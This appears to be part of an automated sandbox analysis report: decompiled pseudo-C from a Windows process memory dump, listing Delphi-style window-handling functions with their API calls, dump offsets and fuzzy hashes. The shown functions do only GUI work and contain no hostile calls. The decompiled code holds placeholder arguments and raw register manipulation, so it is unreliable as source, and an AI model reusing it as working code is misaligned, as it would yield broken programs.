                                                                        											_t251 =  *((intOrPtr*)( *((intOrPtr*)(E00414208(_v8, _t373))) + 0x34))();
                                                                        											_t346 = _v36;
                                                                        											__eflags = _t251 -  *((intOrPtr*)(_t346 + 0xc));
                                                                        											if(_t251 !=  *((intOrPtr*)(_t346 + 0xc))) {
                                                                        												_v16 = E004496B8(E00414208(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 0xc)));
                                                                        											} else {
                                                                        												_v16 =  *((intOrPtr*)(E00414208(_v8, _t373) + 0x34));
                                                                        											}
                                                                        											__eflags = _v16;
                                                                        											if(_v16 != 0) {
                                                                        												break;
                                                                        											}
                                                                        											_t373 = _t373 + 1;
                                                                        											_t291 = _t291 - 1;
                                                                        											__eflags = _t291;
                                                                        											if(_t291 != 0) {
                                                                        												continue;
                                                                        											} else {
                                                                        												goto L67;
                                                                        											}
                                                                        											goto L68;
                                                                        										}
                                                                        										_t257 = E004496E8(E00414208(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 8)));
                                                                        										__eflags = _t257;
                                                                        										if(_t257 == 0) {
                                                                        											_t265 = E00414208(_v8, _t373);
                                                                        											__eflags = 0;
                                                                        											_t257 = E004496E8(_t265, 0,  *((intOrPtr*)(_v36 + 0xc)));
                                                                        										}
                                                                        										_t353 =  *0x495c2c; // 0x496c08
                                                                        										_t355 =  *( *_t353 + 0x6c);
                                                                        										__eflags = _t355;
                                                                        										if(_t355 != 0) {
                                                                        											__eflags = _t257;
                                                                        											if(_t257 == 0) {
                                                                        												_t257 =  *(_t355 + 0x158);
                                                                        											}
                                                                        											_t307 =  *0x495c2c; // 0x496c08
                                                                        											__eflags =  *(_t355 + 0x228) & 0x00000008;
                                                                        											if(( *(_t355 + 0x228) & 0x00000008) == 0) {
                                                                        												_t356 =  *0x495ad0; // 0x496c04
                                                                        												E00456AF8( *_t356, _t291, _t307, _t257, _t373, _t375);
                                                                        											} else {
                                                                        												E00456B60();
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								} else {
                                                                        									L67:
                                                                        									_push( *(_t375 + 8));
                                                                        									_push( *(_t375 + 4));
                                                                        									_push( *_t375);
                                                                        									_t144 =  *((intOrPtr*)(_v8 + 0x10));
                                                                        									_push(_t144);
                                                                        									L00406D8C();
                                                                        									 *((intOrPtr*)(_t375 + 0xc)) = _t144;
                                                                        								}
                                                                        								L68:
                                                                        								_pop(_t311);
                                                                        								 *[fs:eax] = _t311;
                                                                        								_push(0x44a902);
                                                                        								return E00404348( &_v52);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				L69:
                                                                        			}



































































                                                                        0x0044a45b
                                                                        0x00000000
                                                                        0x0044a45b
                                                                        0x00000000
                                                                        0x0044a459
                                                                        0x0044a43c
                                                                        0x00000000
                                                                        0x0044a3f4
                                                                        0x0044a3f4
                                                                        0x0044a3f7
                                                                        0x0044a63a
                                                                        0x0044a643
                                                                        0x0044a644
                                                                        0x0044a646
                                                                        0x00000000
                                                                        0x0044a64c
                                                                        0x0044a64c
                                                                        0x0044a64d
                                                                        0x0044a64d
                                                                        0x0044a64f
                                                                        0x0044a666
                                                                        0x0044a669
                                                                        0x0044a66d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044a735
                                                                        0x0044a736
                                                                        0x0044a736
                                                                        0x0044a737
                                                                        0x00000000
                                                                        0x0044a73d
                                                                        0x00000000
                                                                        0x0044a73d
                                                                        0x00000000
                                                                        0x0044a737
                                                                        0x0044a67f
                                                                        0x0044a684
                                                                        0x0044a685
                                                                        0x0044a68a
                                                                        0x0044a68d
                                                                        0x0044a69c
                                                                        0x0044a6a1
                                                                        0x0044a6a2
                                                                        0x0044a6a7
                                                                        0x0044a6aa
                                                                        0x0044a6b6
                                                                        0x0044a6cb
                                                                        0x0044a6e4
                                                                        0x0044a6eb
                                                                        0x0044a6ee
                                                                        0x0044a6f1
                                                                        0x0044a6f6
                                                                        0x0044a6fb
                                                                        0x0044a710
                                                                        0x0044a710
                                                                        0x0044a3fd
                                                                        0x0044a3fd
                                                                        0x0044a3fe
                                                                        0x0044a745
                                                                        0x0044a74e
                                                                        0x0044a74f
                                                                        0x0044a751
                                                                        0x00000000
                                                                        0x0044a757
                                                                        0x0044a757
                                                                        0x0044a758
                                                                        0x0044a758
                                                                        0x0044a75a
                                                                        0x0044a771
                                                                        0x0044a774
                                                                        0x0044a778
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044a878
                                                                        0x0044a879
                                                                        0x0044a879
                                                                        0x0044a87a
                                                                        0x00000000
                                                                        0x0044a880
                                                                        0x00000000
                                                                        0x0044a880
                                                                        0x00000000
                                                                        0x0044a87a
                                                                        0x0044a781
                                                                        0x0044a785
                                                                        0x0044a78a
                                                                        0x0044a798
                                                                        0x0044a7a7
                                                                        0x0044a7b5
                                                                        0x0044a7c1
                                                                        0x0044a7cf
                                                                        0x0044a7d8
                                                                        0x0044a7ed
                                                                        0x0044a807
                                                                        0x0044a80c
                                                                        0x0044a80f
                                                                        0x0044a812
                                                                        0x0044a817
                                                                        0x0044a81c
                                                                        0x0044a82e
                                                                        0x0044a82e
                                                                        0x0044a404
                                                                        0x0044a407
                                                                        0x0044a538
                                                                        0x0044a541
                                                                        0x0044a542
                                                                        0x0044a544
                                                                        0x00000000
                                                                        0x0044a54a
                                                                        0x0044a54a
                                                                        0x0044a54b
                                                                        0x0044a54b
                                                                        0x0044a54d
                                                                        0x0044a559
                                                                        0x0044a55c
                                                                        0x0044a55f
                                                                        0x0044a562
                                                                        0x0044a58d
                                                                        0x0044a564
                                                                        0x0044a571
                                                                        0x0044a571
                                                                        0x0044a590
                                                                        0x0044a594
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044a62a
                                                                        0x0044a62b
                                                                        0x0044a62b
                                                                        0x0044a62c
                                                                        0x00000000
                                                                        0x0044a632
                                                                        0x00000000
                                                                        0x0044a632
                                                                        0x00000000
                                                                        0x0044a62c
                                                                        0x0044a5ac
                                                                        0x0044a5b1
                                                                        0x0044a5b3
                                                                        0x0044a5ba
                                                                        0x0044a5c5
                                                                        0x0044a5c7
                                                                        0x0044a5c7
                                                                        0x0044a5cc
                                                                        0x0044a5d4
                                                                        0x0044a5d7
                                                                        0x0044a5d9
                                                                        0x0044a5df
                                                                        0x0044a5e1
                                                                        0x0044a5e8
                                                                        0x0044a5e8
                                                                        0x0044a5ee
                                                                        0x0044a5f4
                                                                        0x0044a5fb
                                                                        0x0044a617
                                                                        0x0044a620
                                                                        0x0044a5fd
                                                                        0x0044a60d
                                                                        0x0044a60d
                                                                        0x0044a5fb
                                                                        0x0044a5d9
                                                                        0x0044a40d
                                                                        0x0044a8cb
                                                                        0x0044a8ce
                                                                        0x0044a8d2
                                                                        0x0044a8d5
                                                                        0x0044a8d9
                                                                        0x0044a8dc
                                                                        0x0044a8dd
                                                                        0x0044a8e2
                                                                        0x0044a8e2
                                                                        0x0044a8e5
                                                                        0x0044a8e7
                                                                        0x0044a8ea
                                                                        0x0044a8ed
                                                                        0x0044a8fa
                                                                        0x0044a8fa
                                                                        0x0044a3fe
                                                                        0x0044a3f7
                                                                        0x0044a3f2
                                                                        0x00000000

                                                                        APIs
                                                                        • SaveDC.GDI32(?), ref: 0044A697
                                                                        • RestoreDC.GDI32(?,?), ref: 0044A70B
                                                                        • 72E7B080.USER32(?,00000000,0044A8FB), ref: 0044A785
                                                                        • SaveDC.GDI32(?), ref: 0044A7BC
                                                                        • RestoreDC.GDI32(?,?), ref: 0044A829
                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0044A8FB), ref: 0044A8DD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: RestoreSave$B080NtdllProc_Window
                                                                        • String ID:
                                                                        • API String ID: 4024241980-0
                                                                        • Opcode ID: 130c3424a3909ccd13e925ff723c0cbc4b0ec1993d47858ae47417f6dce1cdc7
                                                                        • Instruction ID: 70641417114627c6e5c73c337fcbb41be0628d56e5109fcb9be53ed2ef629017
                                                                        • Opcode Fuzzy Hash: 130c3424a3909ccd13e925ff723c0cbc4b0ec1993d47858ae47417f6dce1cdc7
                                                                        • Instruction Fuzzy Hash: 8BE15D34A00609DFEB10EF69C48599EF7F5FF98304B6185AAE805A7321C738ED52CB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E0044FECC(intOrPtr __eax, intOrPtr* __edx) {
                                                                        				intOrPtr _v8;
                                                                        				int _v12;
                                                                        				intOrPtr _v16;
                                                                        				struct HDC__* _v20;
                                                                        				intOrPtr* _v24;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t92;
                                                                        				struct HWND__* _t93;
                                                                        				struct HWND__* _t96;
                                                                        				intOrPtr _t116;
                                                                        				intOrPtr _t119;
                                                                        				struct HWND__* _t125;
                                                                        				struct HWND__* _t128;
                                                                        				intOrPtr _t132;
                                                                        				intOrPtr _t133;
                                                                        				intOrPtr _t135;
                                                                        				intOrPtr _t136;
                                                                        				struct HWND__* _t138;
                                                                        				struct HWND__* _t141;
                                                                        				void* _t145;
                                                                        				intOrPtr _t148;
                                                                        				intOrPtr _t179;
                                                                        				struct HDC__* _t184;
                                                                        				intOrPtr* _t207;
                                                                        				intOrPtr _t232;
                                                                        				intOrPtr _t238;
                                                                        				intOrPtr _t245;
                                                                        				struct HWND__* _t249;
                                                                        				struct HWND__* _t250;
                                                                        				struct HWND__* _t255;
                                                                        				intOrPtr* _t256;
                                                                        				void* _t258;
                                                                        				void* _t260;
                                                                        				intOrPtr _t261;
                                                                        				void* _t263;
                                                                        				void* _t267;
                                                                        
                                                                        				_t258 = _t260;
                                                                        				_t261 = _t260 + 0xffffffec;
                                                                        				_t207 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_t92 =  *__edx;
                                                                        				_t263 = _t92 - 0x46;
                                                                        				if(_t263 > 0) {
                                                                        					_t93 = _t92 - 0xb01a;
                                                                        					__eflags = _t93;
                                                                        					if(_t93 == 0) {
                                                                        						__eflags =  *(_v8 + 0xa0);
                                                                        						if(__eflags != 0) {
                                                                        							E004037D8(_v8, __eflags);
                                                                        						}
                                                                        					} else {
                                                                        						__eflags = _t93 == 1;
                                                                        						if(_t93 == 1) {
                                                                        							__eflags =  *(_v8 + 0xa0);
                                                                        							if(__eflags != 0) {
                                                                        								E004037D8(_v8, __eflags);
                                                                        							}
                                                                        						} else {
                                                                        							goto L41;
                                                                        						}
                                                                        					}
                                                                        					goto L43;
                                                                        				} else {
                                                                        					if(_t263 == 0) {
                                                                        						_t116 = _v8;
                                                                        						_t232 =  *0x4502fc; // 0x1
                                                                        						__eflags = _t232 - ( *(_t116 + 0x1c) &  *0x4502f8);
                                                                        						if(_t232 == ( *(_t116 + 0x1c) &  *0x4502f8)) {
                                                                        							_t119 = _v8;
                                                                        							__eflags =  *((intOrPtr*)(_t119 + 0x230)) - 0xffffffffffffffff;
                                                                        							if( *((intOrPtr*)(_t119 + 0x230)) - 0xffffffffffffffff < 0) {
                                                                        								_t132 = _v8;
                                                                        								__eflags =  *((char*)(_t132 + 0x22b)) - 2;
                                                                        								if( *((char*)(_t132 + 0x22b)) != 2) {
                                                                        									_t133 =  *((intOrPtr*)(__edx + 8));
                                                                        									_t26 = _t133 + 0x18;
                                                                        									 *_t26 =  *(_t133 + 0x18) | 0x00000002;
                                                                        									__eflags =  *_t26;
                                                                        								}
                                                                        							}
                                                                        							_t125 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
                                                                        							__eflags = _t125;
                                                                        							if(_t125 == 0) {
                                                                        								L30:
                                                                        								_t128 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
                                                                        								__eflags = _t128;
                                                                        								if(_t128 == 0) {
                                                                        									L32:
                                                                        									 *( *((intOrPtr*)(_t207 + 8)) + 0x18) =  *( *((intOrPtr*)(_t207 + 8)) + 0x18) | 0x00000001;
                                                                        								} else {
                                                                        									__eflags = _t128 == 3;
                                                                        									if(_t128 == 3) {
                                                                        										goto L32;
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								__eflags = _t125 == 2;
                                                                        								if(_t125 == 2) {
                                                                        									goto L30;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L43;
                                                                        					} else {
                                                                        						_t96 = _t92 + 0xfffffffa - 3;
                                                                        						if(_t96 < 0) {
                                                                        							__eflags =  *0x47aaf4;
                                                                        							if( *0x47aaf4 != 0) {
                                                                        								__eflags =  *__edx - 7;
                                                                        								if( *__edx != 7) {
                                                                        									goto L43;
                                                                        								} else {
                                                                        									_t135 = _v8;
                                                                        									__eflags =  *(_t135 + 0x1c) & 0x00000010;
                                                                        									if(( *(_t135 + 0x1c) & 0x00000010) != 0) {
                                                                        										goto L43;
                                                                        									} else {
                                                                        										_t255 = 0;
                                                                        										_t136 = _v8;
                                                                        										__eflags =  *((char*)(_t136 + 0x22f)) - 2;
                                                                        										if( *((char*)(_t136 + 0x22f)) != 2) {
                                                                        											_t138 =  *(_v8 + 0x220);
                                                                        											__eflags = _t138;
                                                                        											if(_t138 != 0) {
                                                                        												__eflags = _t138 - _v8;
                                                                        												if(_t138 != _v8) {
                                                                        													_t255 = E0043CC2C(_t138);
                                                                        												}
                                                                        											}
                                                                        										} else {
                                                                        											_t141 = E0045072C(_v8);
                                                                        											__eflags = _t141;
                                                                        											if(_t141 != 0) {
                                                                        												_t255 = E0043CC2C(E0045072C(_v8));
                                                                        											}
                                                                        										}
                                                                        										__eflags = _t255;
                                                                        										if(_t255 == 0) {
                                                                        											goto L43;
                                                                        										} else {
                                                                        											_t96 = SetFocus(_t255);
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							goto L44;
                                                                        						} else {
                                                                        							_t145 = _t96 - 0x22;
                                                                        							if(_t145 == 0) {
                                                                        								_v24 =  *((intOrPtr*)(__edx + 8));
                                                                        								__eflags =  *_v24 - 1;
                                                                        								if( *_v24 != 1) {
                                                                        									goto L43;
                                                                        								} else {
                                                                        									_t148 = _v8;
                                                                        									__eflags =  *(_t148 + 0x248);
                                                                        									if( *(_t148 + 0x248) == 0) {
                                                                        										goto L43;
                                                                        									} else {
                                                                        										_t249 = E004496B8( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
                                                                        										__eflags = _t249;
                                                                        										if(_t249 == 0) {
                                                                        											goto L43;
                                                                        										} else {
                                                                        											_v16 = E0041FDA0(0, 1);
                                                                        											_push(_t258);
                                                                        											_push(0x450142);
                                                                        											_push( *[fs:eax]);
                                                                        											 *[fs:eax] = _t261;
                                                                        											_v12 = SaveDC( *(_v24 + 0x18));
                                                                        											_push(_t258);
                                                                        											_push(0x450125);
                                                                        											_push( *[fs:eax]);
                                                                        											 *[fs:eax] = _t261;
                                                                        											E004207B0(_v16,  *(_v24 + 0x18));
                                                                        											E0042062C(_v16);
                                                                        											E0044ABA0(_t249, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
                                                                        											_pop(_t238);
                                                                        											 *[fs:eax] = _t238;
                                                                        											_push(0x45012c);
                                                                        											__eflags = 0;
                                                                        											E004207B0(_v16, 0);
                                                                        											return RestoreDC( *(_v24 + 0x18), _v12);
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								if(_t145 == 1) {
                                                                        									_t256 =  *((intOrPtr*)(__edx + 8));
                                                                        									__eflags =  *_t256 - 1;
                                                                        									if( *_t256 != 1) {
                                                                        										goto L43;
                                                                        									} else {
                                                                        										_t179 = _v8;
                                                                        										__eflags =  *(_t179 + 0x248);
                                                                        										if( *(_t179 + 0x248) == 0) {
                                                                        											goto L43;
                                                                        										} else {
                                                                        											_t250 = E004496B8( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t256 + 8)));
                                                                        											__eflags = _t250;
                                                                        											if(_t250 == 0) {
                                                                        												goto L43;
                                                                        											} else {
                                                                        												_t184 = E0043CC2C(_v8);
                                                                        												L00406FC4();
                                                                        												_v20 = _t184;
                                                                        												 *[fs:eax] = _t261;
                                                                        												_v16 = E0041FDA0(0, 1);
                                                                        												 *[fs:eax] = _t261;
                                                                        												_v12 = SaveDC(_v20);
                                                                        												 *[fs:eax] = _t261;
                                                                        												E004207B0(_v16, _v20);
                                                                        												E0042062C(_v16);
                                                                        												 *((intOrPtr*)(_t250->i + 0x38))(_t256 + 0x10,  *[fs:eax], 0x45022c, _t258,  *[fs:eax], 0x450249, _t258,  *[fs:eax], 0x450270, _t258, _t184);
                                                                        												_pop(_t245);
                                                                        												 *[fs:eax] = _t245;
                                                                        												_push(0x450233);
                                                                        												__eflags = 0;
                                                                        												E004207B0(_v16, 0);
                                                                        												return RestoreDC(_v20, _v12);
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								} else {
                                                                        									L41:
                                                                        									_t267 =  *_t207 -  *0x496c10; // 0xc075
                                                                        									if(_t267 == 0) {
                                                                        										E00437760(_v8, 0, 0xb025, 0);
                                                                        										E00437760(_v8, 0, 0xb024, 0);
                                                                        										E00437760(_v8, 0, 0xb035, 0);
                                                                        										E00437760(_v8, 0, 0xb009, 0);
                                                                        										E00437760(_v8, 0, 0xb008, 0);
                                                                        										E00437760(_v8, 0, 0xb03d, 0);
                                                                        									}
                                                                        									L43:
                                                                        									_t96 = E0043A6DC(_v8, _t207);
                                                                        									L44:
                                                                        									return _t96;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: RestoreSave$B080Focus
                                                                        • String ID:
                                                                        • API String ID: 809140284-0
                                                                        • Opcode ID: 789ad88bdf9d0dc65a6386dd81293534481b1fb8196139f914db52c916d73454
                                                                        • Instruction ID: 36f440bda38272c3496fecbe59fbd02416aab16c8b4ac7df962fff14ab053147
                                                                        • Opcode Fuzzy Hash: 789ad88bdf9d0dc65a6386dd81293534481b1fb8196139f914db52c916d73454
                                                                        • Instruction Fuzzy Hash: 7DB15138A00104DFDB14DFA9D589EAEB3F5EB09304F6540A6F805A7762C738EE45DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 37%
                                                                        			E00456024(void* __eax) {
                                                                        				struct HWND__* _t21;
                                                                        				intOrPtr* _t26;
                                                                        				signed int _t29;
                                                                        				intOrPtr* _t30;
                                                                        				int _t33;
                                                                        				intOrPtr _t36;
                                                                        				void* _t51;
                                                                        				int _t60;
                                                                        
                                                                        				_t51 = __eax;
                                                                        				_t21 = IsIconic( *(__eax + 0x30));
                                                                        				if(_t21 != 0) {
                                                                        					SetActiveWindow( *(_t51 + 0x30));
                                                                        					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
                                                                        						L6:
                                                                        						E0045501C( *(_t51 + 0x30), 9, __eflags);
                                                                        					} else {
                                                                        						_t60 = IsWindowEnabled(E0043CC2C( *((intOrPtr*)(_t51 + 0x44))));
                                                                        						if(_t60 == 0) {
                                                                        							goto L6;
                                                                        						} else {
                                                                        							_push(0);
                                                                        							_push(0xf120);
                                                                        							_push(0x112);
                                                                        							_push( *(_t51 + 0x30));
                                                                        							L00406D8C();
                                                                        						}
                                                                        					}
                                                                        					_t26 =  *0x495998; // 0x496a9c
                                                                        					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
                                                                        					if(_t60 < 0) {
                                                                        						asm("adc eax, 0x0");
                                                                        					}
                                                                        					_t30 =  *0x495998; // 0x496a9c
                                                                        					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
                                                                        					if(_t60 < 0) {
                                                                        						asm("adc eax, 0x0");
                                                                        					}
                                                                        					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
                                                                        					_t36 =  *((intOrPtr*)(_t51 + 0x44));
                                                                        					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
                                                                        						E00450DD4(_t36, 0);
                                                                        						E004531AC( *((intOrPtr*)(_t51 + 0x44)));
                                                                        					}
                                                                        					E00455698(_t51);
                                                                        					_t21 =  *0x496c08; // 0x215094c
                                                                        					_t55 =  *((intOrPtr*)(_t21 + 0x64));
                                                                        					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
                                                                        						_t21 = SetFocus(E0043CC2C(_t55));
                                                                        					}
                                                                        					if( *((short*)(_t51 + 0x10a)) != 0) {
                                                                        						return  *((intOrPtr*)(_t51 + 0x108))();
                                                                        					}
                                                                        				}
                                                                        				return _t21;
                                                                        			}












                                                                        APIs
                                                                        • IsIconic.USER32 ref: 0045602C
                                                                        • SetActiveWindow.USER32(?,?,?,?,00455A6E,00000000,00455F10), ref: 0045603D
                                                                        • IsWindowEnabled.USER32(00000000), ref: 00456060
                                                                        • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00455A6E,00000000,00455F10), ref: 00456079
                                                                        • SetWindowPos.USER32(?,00000000,00000000,?,?,00455A6E,00000000,00455F10), ref: 004560BF
                                                                        • SetFocus.USER32(00000000,?,00000000,00000000,?,?,00455A6E,00000000,00455F10), ref: 00456104
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                                                                        • String ID:
                                                                        • API String ID: 3996302123-0
                                                                        • Opcode ID: 47e2a0eaacd7a01a8f9391b870114d1f20509724b9173774fd90bf9746b98b00
                                                                        • Instruction ID: addb31afefe918bacc646d6c2825af304f505386283c36deccf03dfcd198963b
                                                                        • Opcode Fuzzy Hash: 47e2a0eaacd7a01a8f9391b870114d1f20509724b9173774fd90bf9746b98b00
                                                                        • Instruction Fuzzy Hash: A7312F707002409BEF11EF69CC85B6A3798AB04715F4914AABD44DF2D7CA7DEC888759
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E0043C658(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
                                                                        				void* _v20;
                                                                        				struct _WINDOWPLACEMENT _v48;
                                                                        				char _v64;
                                                                        				void* _t31;
                                                                        				int _t45;
                                                                        				int _t51;
                                                                        				void* _t52;
                                                                        				int _t56;
                                                                        				int _t58;
                                                                        
                                                                        				_t56 = __ecx;
                                                                        				_t58 = __edx;
                                                                        				_t52 = __eax;
                                                                        				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
                                                                        					L4:
                                                                        					if(E0043CF30(_t52) == 0) {
                                                                        						L7:
                                                                        						 *(_t52 + 0x40) = _t58;
                                                                        						 *(_t52 + 0x44) = _t56;
                                                                        						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
                                                                        						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
                                                                        						_t31 = E0043CF30(_t52);
                                                                        						__eflags = _t31;
                                                                        						if(_t31 != 0) {
                                                                        							_v48.length = 0x2c;
                                                                        							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
                                                                        							E00435F4C(_t52,  &_v64);
                                                                        							asm("movsd");
                                                                        							asm("movsd");
                                                                        							asm("movsd");
                                                                        							asm("movsd");
                                                                        							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
                                                                        						}
                                                                        						L9:
                                                                        						E00435C00(_t52);
                                                                        						return E004037D8(_t52, _t66);
                                                                        					}
                                                                        					_t45 = IsIconic( *(_t52 + 0x180));
                                                                        					_t66 = _t45;
                                                                        					if(_t45 != 0) {
                                                                        						goto L7;
                                                                        					}
                                                                        					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
                                                                        					goto L9;
                                                                        				} else {
                                                                        					_t51 = _a4;
                                                                        					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
                                                                        						return _t51;
                                                                        					}
                                                                        					goto L4;
                                                                        				}
                                                                        			}













                                                                        APIs
                                                                        • IsIconic.USER32 ref: 0043C697
                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0043C6B5
                                                                        • GetWindowPlacement.USER32(?,0000002C), ref: 0043C6EB
                                                                        • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 0043C70F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$Placement$Iconic
                                                                        • String ID: ,
                                                                        • API String ID: 568898626-3772416878
                                                                        • Opcode ID: d673cbac4b45b127f152e2a7f44669bc25f880b068426fc47df972cefe3dfc3b
                                                                        • Instruction ID: 5d51642662571711970a0e3d645df3d0aa1085e755de78576171e9613f821380
                                                                        • Opcode Fuzzy Hash: d673cbac4b45b127f152e2a7f44669bc25f880b068426fc47df972cefe3dfc3b
                                                                        • Instruction Fuzzy Hash: B7213071A00208ABCF54EF69C8C199A77A9AF0D354F05906BFE14EF346D779ED048BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 79%
                                                                        			E00455F74(void* __eax) {
                                                                        				int _t21;
                                                                        				struct HWND__* _t36;
                                                                        				void* _t40;
                                                                        
                                                                        				_t40 = __eax;
                                                                        				_t1 = _t40 + 0x30; // 0x0
                                                                        				_t21 = IsIconic( *_t1);
                                                                        				if(_t21 == 0) {
                                                                        					E00455688();
                                                                        					_t2 = _t40 + 0x30; // 0x0
                                                                        					SetActiveWindow( *_t2);
                                                                        					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E0043CC2C( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
                                                                        						_t15 = _t40 + 0x30; // 0x0
                                                                        						_t21 = E0045501C( *_t15, 6, __eflags);
                                                                        					} else {
                                                                        						_t43 =  *((intOrPtr*)(_t40 + 0x44));
                                                                        						_t36 = E0043CC2C( *((intOrPtr*)(_t40 + 0x44)));
                                                                        						_t13 = _t40 + 0x30; // 0x0
                                                                        						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
                                                                        						_push(0);
                                                                        						_push(0xf020);
                                                                        						_push(0x112);
                                                                        						_t14 = _t40 + 0x30; // 0x0
                                                                        						_t21 =  *_t14;
                                                                        						_push(_t21);
                                                                        						L00406D8C();
                                                                        					}
                                                                        					if( *((short*)(_t40 + 0x102)) != 0) {
                                                                        						return  *((intOrPtr*)(_t40 + 0x100))();
                                                                        					}
                                                                        				}
                                                                        				return _t21;
                                                                        			}







                                                                        APIs
                                                                        • IsIconic.USER32 ref: 00455F7C
                                                                        • SetActiveWindow.USER32(00000000,00000000,?,?,0045660C), ref: 00455F94
                                                                        • IsWindowEnabled.USER32(00000000), ref: 00455FB7
